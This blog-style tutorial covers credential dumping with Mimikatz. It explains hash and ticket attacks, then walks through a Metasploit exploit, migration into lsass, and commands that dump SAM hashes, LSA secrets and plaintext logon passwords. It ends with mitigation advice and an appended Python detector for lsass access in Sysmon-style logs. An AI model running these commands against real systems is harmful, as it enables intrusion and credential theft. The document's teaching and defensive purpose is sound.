Dumping Hashes with Mimikatz
Mimikatz is a popular post-exploitation tool that attackers use to steal authentication credentials stored in memory, particularly on Windows systems. Written by Benjamin Delpy, it can retrieve plaintext passwords, hashes, and other credentials from memory, which attackers then use to gain elevated access and move laterally within a network.
I uploaded a video on my YouTube channel demonstrating how to perform those steps.
How Mimikatz works:
1. Pass-the-Ticket Attacks:
- Mimikatz can extract Kerberos tickets from memory. Kerberos is the default authentication protocol used in Windows environments. By stealing these tickets, an attacker can impersonate a user and gain unauthorised access.
2. Pass-the-Hash Attacks:
- It can extract password hashes stored in memory. Instead of stealing plaintext passwords, Mimikatz can use these password hashes directly to authenticate and escalate privileges without needing the password.
3. Pass-the-Certificate Attacks:
- Mimikatz can also target authentication certificates stored in the Windows Credential Manager.
4. Golden Ticket Attacks:
- Mimikatz allows the creation of "Golden Tickets", which are forged Kerberos tickets. These tickets can provide long-term and persistent access to a network.
5. Silver Ticket Attacks:
- Similar to golden tickets, silver tickets are forged tickets that allow an attacker to access specific services within a network.
6. Credential Dumping:
- Mimikatz has various modules that dump different credentials, including plaintext passwords, NTLM hashes, and Kerberos tickets.
It's important to note that Mimikatz has legitimate uses, for example by security professionals testing and improving the security of their own environments. However, it has gained notoriety as a weapon in the hands of malicious actors because of its ability to exploit weaknesses in the Windows authentication system. Organisations use security measures such as endpoint protection and detection systems to defend against Mimikatz and similar tools.
Walkthrough:
- Run nmap against the target IP with service version detection.
- Once we have the service version, start msfconsole:
service postgresql start && msfconsole
- search bedblue
- Type 1 (the default payload will be used).
- show options
- Configure the target IP:
set rhost "target IP"
- exploit
- After the meterpreter session has been established, gather some information about the system:
sysinfo
getuid
- Then find the lsass process and migrate into it:
pgrep lsass
migrate 788
- Let's start with kiwi:
load kiwi
- Open the help menu.
- creds_all
- lsa_dump_sam (dumps the NTLM hashes of all user accounts on the system)
- lsa_dump_secrets
- Change to the root of the system drive:
cd C:\\
- Create a Temp folder and upload mimikatz.exe to it:
mkdir Temp
cd Temp
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
- Open a shell session by typing shell, then:
dir
.\mimikatz.exe
- Check privileges:
privilege::debug
This requests the debug privilege (SeDebugPrivilege). It is required to debug and adjust the memory of a process owned by another account (user right: "Debug programs").
- To dump the contents of the SAM database:
lsadump::sam
This dumps the local Security Account Manager (SAM) NT hashes (cf. SAM secrets dump). It can operate directly on the target system or offline with backups of the registry hives (SAM and SYSTEM). It accepts further command-line arguments (not covered here). The output includes the SysKey, the SAM key, and the NTLM hash of each account.
- lsadump::secrets
This dumps the LSA secrets from the registry. It retrieves the SysKey to decrypt the Secrets entries.
- Whenever a user logs in to the system, if the system is configured to store the password in memory in clear text, Mimikatz can show that password:
sekurlsa::logonpasswords
Mitigation
Organisations should adopt a multi-layered security approach to mitigate the risks associated with Mimikatz and similar credential-dumping tools. This means deploying robust endpoint protection with up-to-date antivirus and anti-malware tooling, enabling features like Credential Guard on Windows systems, following the principle of least privilege to limit access, and requiring multi-factor authentication. Regularly patching operating systems and software, implementing network segmentation, and establishing comprehensive monitoring and logging practices are essential. User education on phishing threats, strong password practices, and reporting suspicious activity is crucial. Additionally, disabling unnecessary services and protocols and having a well-defined incident response plan contribute to a holistic strategy for mitigating the risks posed by tools like Mimikatz.
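The monitoring called for above needs concrete detection logic for the two steps this walkthrough relies on: a handle to lsass.exe opened with memory-read access (privilege::debug followed by the sekurlsa and lsadump modules), and a remote thread created in lsass (the migrate step). The following Python is an added example, not part of the original post or of Mimikatz or Metasploit; it scores constructed Sysmon-style Event 10 (ProcessAccess) and Event 8 (CreateRemoteThread) records. The allow-list, the key=value record format and every sample value are assumptions.

```python
import re
# Windows PROCESS_* access-mask bits a credential dumper needs on lsass.exe.
PROCESS_VM_READ, PROCESS_VM_WRITE = 0x0010, 0x0020
MEMORY_ACCESS = PROCESS_VM_READ | PROCESS_VM_WRITE

# Hypothetical allow-list of binaries that legitimately open lsass.exe;
# baseline it on real hosts before relying on it.
ALLOWED_SOURCES = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe",
                   r"c:\windows\system32\svchost.exe"}
KV_RE = re.compile(r"(\w+)=(\S+)")

def parse_event(line):
    """Parse one space-separated key=value Sysmon-style record into a dict."""
    return dict(KV_RE.findall(line))

def classify(event):
    """Return a severity string for one record, or None if it is benign."""
    if not event.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return None
    if event.get("EventID") == "8":
        # CreateRemoteThread into lsass: the trace left by migrating a
        # meterpreter session into the lsass PID. Never allow-listed.
        return "high: remote thread created in lsass"
    if event.get("EventID") == "10":
        access = int(event.get("GrantedAccess", "0"), 16)
        source = event.get("SourceImage", "").lower()
        if not access & MEMORY_ACCESS or source in ALLOWED_SOURCES:
            return None
        # Sysmon writes UNKNOWN(addr) for stack frames not backed by a file
        # on disk, i.e. injected code such as an in-memory kiwi module.
        level = "high" if "UNKNOWN" in event.get("CallTrace", "") else "medium"
        return "%s: lsass memory access 0x%04x" % (level, access)

def scan(lines):
    """Classify every record; return (SourceImage, severity) for each hit."""
    hits = []
    for ev in map(parse_event, lines):
        sev = classify(ev)
        if sev:
            hits.append((ev.get("SourceImage"), sev))
    return hits

# Constructed sample records, not real telemetry (all values are made up).
SAMPLE_LOG = [
    r"EventID=10 SourceImage=C:\Windows\System32\svchost.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1010 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9c534",
    r"EventID=10 SourceImage=C:\Temp\mimikatz.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1010 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9c534|C:\Temp\mimikatz.exe+1d2f3",
    r"EventID=10 SourceImage=C:\Windows\System32\spoolsv.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1410 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9c534|UNKNOWN(000001B1D0E7A000)",
    r"EventID=8 SourceImage=C:\Windows\System32\spoolsv.exe TargetImage=C:\Windows\System32\lsass.exe",
]
```

Running scan(SAMPLE_LOG) returns three hits: the mimikatz.exe handle at medium, the spoolsv.exe handle with an unbacked call stack at high, and the remote thread at high; the allow-listed svchost.exe handle is suppressed.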